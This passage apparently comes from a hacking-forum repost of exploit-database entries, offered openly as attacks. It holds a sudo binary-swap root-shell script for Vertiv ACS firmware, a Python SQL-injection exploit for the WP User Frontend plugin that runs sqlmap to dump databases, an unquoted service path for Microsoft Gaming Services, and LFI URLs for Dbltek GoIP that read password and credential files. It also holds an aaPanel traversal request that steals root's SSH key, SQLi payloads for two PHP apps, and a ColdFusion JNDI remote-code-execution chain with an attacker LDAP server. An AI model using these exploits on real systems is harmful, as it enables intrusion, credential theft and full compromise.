'https://downloads2.vertivco.com/SerialACS/ACS/ACS_v3.3.0-16/FL0536-017.zip' -o FL0536-017.zip && unzip FL0536-017.zip $$ binwalk -e FL0536-017.bin #sudo mount -o ro,loop _FL0536-017.bin.extracted/148000 $TMPDIR && sudo cat "$TMPDIR/etc/sudoers" #echo "As you can see, the sudo permissions on various binaries, like that of /bin/mv, are risky." # ! EXPLOIT CODE BELOW ! # # ------- # Once you exit the root shell, this will clean up and put the binaries back where they belong. echo "Creating backups of sed & bash binaries" sudo cp /bin/sed /bin/sed.bak sudo cp /bin/bash /bin/bash.bak echo "Saved as bash.bak & sed.bak" sudo mv /bin/bash /bin/sed sudo /bin/sed echo "Replacing our binary with the proper one" sudo mv /bin/bash.bak /bin/bash && sudo mv /bin/sed.bak /bin/sed
  19. HireHackking

    WordPress Plugin WP User Frontend 3.5.25 - SQLi (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Plugin WP User Frontend 3.5.25 - SQLi (Authenticated) # Date 20.02.2022 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: https://wedevs.com/ # Software Link: https://downloads.wordpress.org/plugin/wp-user-frontend.3.5.25.zip # Version: < 3.5.25 # Tested on: Ubuntu 20.04 # CVE: CVE-2021-25076 # CWE: CWE-89 # Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-25076/README.md ''' Description: The WP User Frontend WordPress plugin before 3.5.26 does not validate and escape the status parameter before using it in a SQL statement in the Subscribers dashboard, leading to an SQL injection. Due to the lack of sanitisation and escaping, this could also lead to Reflected Cross-Site Scripting ''' banner = ''' _|_|_| _| _| _|_|_|_| _|_| _| _|_| _| _|_| _|_|_|_| _| _|_|_|_|_| _|_|_| _| _| _| _| _| _| _| _| _| _| _|_| _| _| _| _| _| _| _| _| _| _| _|_|_| _|_|_|_|_| _| _| _| _| _| _|_|_|_|_| _| _|_|_| _| _| _| _|_|_| _| _| _| _| _| _| _| _| _| _| _| _| _| _| _| _| _|_|_| _| _|_|_|_| _|_|_|_| _| _|_|_|_| _| _|_|_|_| _|_|_| _| _| _|_| [+] WP User Frontend - SQL Injection [@] Developed by Ron Jost (Hacker5preme) ''' print(banner) import argparse from datetime import datetime import os import requests import json # User-Input: my_parser = argparse.ArgumentParser(description= 'WP User Frontend - SQL-Injection (Authenticated)') my_parser.add_argument('-T', '--IP', type=str) my_parser.add_argument('-P', '--PORT', type=str) my_parser.add_argument('-U', '--PATH', type=str) my_parser.add_argument('-u', '--USERNAME', type=str) my_parser.add_argument('-p', '--PASSWORD', type=str) args = my_parser.parse_args() target_ip = args.IP target_port = args.PORT wp_path = args.PATH username = args.USERNAME password = args.PASSWORD print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S'))) # Authentication: session = requests.Session() auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php' check = session.get(auth_url) # Header: header = { 'Host': target_ip, 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': 'http://' + target_ip, 'Connection': 'close', 'Upgrade-Insecure-Requests': '1' } # Body: body = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'testcookie': '1' } auth = session.post(auth_url, headers=header, data=body) # SQL-Injection (Exploit): # Generate payload for sqlmap cookies_session = session.cookies.get_dict() cookie = json.dumps(cookies_session) cookie = cookie.replace('"}','') cookie = cookie.replace('{"', '') cookie = cookie.replace('"', '') cookie = cookie.replace(" ", '') cookie = cookie.replace(":", '=') cookie = cookie.replace(',', '; ') print('[*] Payload for SQL-Injection:') exploitcode_url = r'sqlmap -u "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin.php?page=wpuf_subscribers&post_ID=1&status=1" ' exploitcode_risk = '--level 2 --risk 2 ' exploitcode_cookie = '--cookie="' + cookie + '" ' print(' Sqlmap options:') print(' -a, --all Retrieve everything') print(' -b, --banner Retrieve DBMS banner') print(' --current-user Retrieve DBMS current user') print(' --current-db Retrieve DBMS current database') print(' --passwords Enumerate DBMS users password hashes') print(' --tables Enumerate DBMS database tables') print(' --columns Enumerate DBMS database table column') print(' --schema Enumerate DBMS schema') print(' --dump Dump DBMS database table entries') print(' --dump-all Dump all DBMS databases tables entries') retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ') exploitcode = exploitcode_url + exploitcode_risk + exploitcode_cookie + retrieve_mode + ' -p status -v 0 --answers="follow=Y" --batch' os.system(exploitcode) print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))
  20. HireHackking

    Microsoft Gaming Services 2.52.13001.0 - Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Microsoft Gaming Services 2.52.13001.0 - Unquoted Service Path # Discovery by: Johto Robbie # Discovery Date: May 12, 2021 # Tested Version: 2.52.13001.0 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 x64 Home # Step to discover Unquoted Service Path: Go to Start and type cmd. Enter the following command and press Enter: C:\Users\Bang's>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\" | findstr /i /v """ Gaming Services GamingServices C:\Program Files\WindowsApps\Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe\GamingServices.exe Auto Gaming Services GamingServicesNet C:\Program Files\WindowsApps\Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe\GamingServicesNet.exe Auto C:\Users\Bang's>sc qc "GamingServices" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: GamingServices TYPE : 210 WIN32_PACKAGED_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : C:\Program Files\WindowsApps\Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe\GamingServices.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Gaming Services DEPENDENCIES : staterepository SERVICE_START_NAME : LocalSystem This application have no quote . And it contained in C:\Program Files. Put mot malicious aplication with name "progarm.exe" Stop & Start: GamingServices. "progarm.exe" will be execute #Exploit: An unquoted service path in Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe, could lead to privilege escalation during the installation process that is performed when an executable file is registered. This could further lead to complete compromise of confidentiality, Integrity and Availability. #Timeline May 12, 2021 - Reported to Microsoft Feb 11, 2022 - Confirmed vulnerability has been fixed
  21. HireHackking

    Dbltek GoIP - Local File Inclusion

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Dbltek GoIP - Local File Inclusion # Date: 20.02.2022 # Exploit Author: Valtteri Lehtinen & Lassi Korhonen # Vendor Homepage: http://en.dbltek.com/index.html # Software Link: - # Version: GHSFVT-1.1-67-5 (firmware version) # Tested on: Target is an IoT device # Exploit summary Dbltek GoIP-1 is a VoIP-GSM gateway device, which allows making calls and sending SMS messages using SIP. The device has a webserver that contains two pre-auth Local File Inclusion vulnerabilities. Using these, it is possible to download the device configuration file containing all device credentials (including admin panel credentials and SIP credentials) if the configuration file has been backed up. It is probable that also other models and versions of Dbltek GoIP devices are affected. Writeup: https://shufflingbytes.com/posts/hacking-goip-gsm-gateway/ # Proof of Concept Assuming the device is available on IP 192.168.9.1. Download /etc/passwd http://192.168.9.1/default/en_US/frame.html?content=3D..%2f..%2f..%2f ..%2f..%2fetc%2fpasswd http://192.168.9.1/default/en_US/frame.A100.html?sidebar=3D..%2f..%2f ..%2f..%2f..%2fetc%2fpasswd Download device configuration file from /tmp/config.dat (requires that the configuration file has been backed up) http://192.168.9.1/default/en_US/frame.html?content=3D..%2f..%2f..%2f..%2f..%2ftmp%2fconfig.dat http://192.168.9.1/default/en_US/frame.A100.html?sidebar=3D..%2f..%2f..%2f..%2f..%2ftmp%2fconfig.dat
  22. HireHackking

    aaPanel 6.8.21 - Directory Traversal (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: aaPanel 6.8.21 - Directory Traversal (Authenticated) # Date: 22.02.2022 # Exploit Author: Fikrat Ghuliev (Ghuliev) # Vendor Homepage: https://www.aapanel.com/ # Software Link: https://www.aapanel.com # Version: 6.8.21 # Tested on: Ubuntu Application vulnerable to Directory Traversal and attacker can get root user private ssh key(id_rsa) #Go to App Store #Click to "install" in any free plugin. #Change installation script to ../../../root/.ssh/id_rsa POST /ajax?action=get_lines HTTP/1.1 Host: IP:7800 Content-Length: 41 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://IP:7800 Referer: http://IP:7800/soft Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: aa0775f98350c5c13bfd21f2c6b8c288=d20c4937-e5ae-46fb-b8bd-fa7c290d805a.ohyRHdOIMj3DBfyddCRbL-rlKB0; request_token=nKLXa4RUXgwBHeWNyMH1MEDSkTaks9dWjQ7zzA0iRc7lrHwd; serverType=nginx; order=id%20desc; memSize=3889; vcodesum=13; page_number=20; backup_path=/www/backup; sites_path=/www/wwwroot; distribution=ubuntu; serial_no=; pro_end=-1; load_page=null; load_type=null; load_search=undefined; force=0; rank=list; Path=/www/wwwroot; bt_user_info=; default_dir_path=/www/wwwroot/; path_dir_change=/www/wwwroot/ Connection: close num=10&filename=../../../root/.ssh/id_rsa
  23. HireHackking

    Air Cargo Management System v1.0 - SQLi

    HireHackking posted a blog entry in Hacker Technology
    # Title: Air Cargo Management System v1.0 - SQLi # Author: nu11secur1ty # Date: 02.18.2022 # Vendor: https://www.sourcecodester.com/users/tips23 # Software: https://www.sourcecodester.com/php/15188/air-cargo-management-system-php-oop-free-source-code.html # Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/oretnom23/2022/Air-Cargo-Management-System # Description: The `ref_code` parameter from Air Cargo Management System v1.0 appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\c5idmpdvfkqycmiqwv299ljz1q7jvej5mtdg44t.https://www.sourcecodester.com/php/15188/air-cargo-management-system-php-oop-free-source-code.html\\hag'))+' was submitted in the ref_code parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. WARNING: If this is in some external domain, or some subdomain redirection, or internal whatever, this will be extremely dangerous! Status: CRITICAL [+] Payloads: --- Parameter: ref_code (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: p=trace&ref_code=258044'+(select load_file('\\\\c5idmpdvfkqycmiqwv299ljz1q7jvej5mtdg44t.https://www.sourcecodester.com/php/15188/air-cargo-management-system-php-oop-free-source-code.html\\hag'))+'' AND (SELECT 9012 FROM (SELECT(SLEEP(3)))xEdD) AND 'JVki'='JVki ---
  24. HireHackking

    Simple Real Estate Portal System 1.0 - 'id' SQLi

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Simple Real Estate Portal System 1.0 - 'id' SQL Injection # Date: 22/02/2022 # Exploit Author: Mosaaed # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/15184/simple-real-estate-portal-system-phpoop-free-source-code.html # Version: 1.0 # Tested on: Linux mosaaed 5.5.0-1parrot1-amd64 #1 SMP Parrot 5.5.17-1parrot1 (2020-04-25) x86_64 GNU/Linux # Sqlmap command: sqlmap -u "http://localhost/reps/?p=view_estate&id=6" --batch --dbs # Output: Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: p=view_estate&id=6' AND 9373=9373 AND 'CcAj'='CcAj Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: p=view_estate&id=6' AND (SELECT 4967 FROM (SELECT(SLEEP(5)))Lowr) AND 'iyVC'='iyVC Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: p=view_estate&id=-3391' UNION ALL SELECT NULL,CONCAT(0x716b7a7a71,0x6a56556147504d795a536b566c7a4f5659677a65514c706758485a66484f464e5676496470695a41,0x7162767171),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
  25. HireHackking

    Adobe ColdFusion 11 - LDAP Java Object Deserialization Remode Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Adobe ColdFusion 11 - LDAP Java Object Deserialization Remode Code Execution (RCE) # Google Dork: intext:"adobe coldfusion 11" # Date: 2022-22-02 # Exploit Author: Amel BOUZIANE-LEBLOND (https://twitter.com/amellb) # Vendor Homepage: https://www.adobe.com/sea/products/coldfusion-family.html # Version: Adobe Coldfusion (11.0.03.292866) # Tested on: Microsoft Windows Server & Linux # Description: # ColdFusion allows an unauthenticated user to connect to any LDAP server. An attacker can exploit it to achieve remote code execution. # JNDI attack via the 'verifyldapserver' parameter on the utils.cfc ==================== 1.Setup rogue-jndi Server ==================== https://github.com/veracode-research/rogue-jndi ==================== 2.Preparing the Attack ======================= java -jar target/RogueJndi-1.1.jar --command "touch /tmp/owned" --hostname "attacker_box" ==================== 3.Launch the Attack ========================== http://REDACTED/CFIDE/wizards/common/utils.cfc?method=verifyldapserver&vserver=LDAP_SERVER&vport=LDAP_PORT&vstart=&vusername=&vpassword=&returnformat=json curl -i -s -k -X $'GET' \ -H $'Host: target' \ --data-binary $'\x0d\x0a\x0d\x0a' \ $'http://REDACTED//CFIDE/wizards/common/utils.cfc?method=verifyldapserver&vserver=LDAP_SERVER&vport=LDAP_PORT&vstart=&vusername=&vpassword=&returnformat=json' ==================== 4.RCE ======================================= Depend on the target need to compile the rogue-jndi server with JAVA 7 or 8 Can be done by modify the pom.xml as below <configuration> <source>7</source> <target>7</target> </configuration>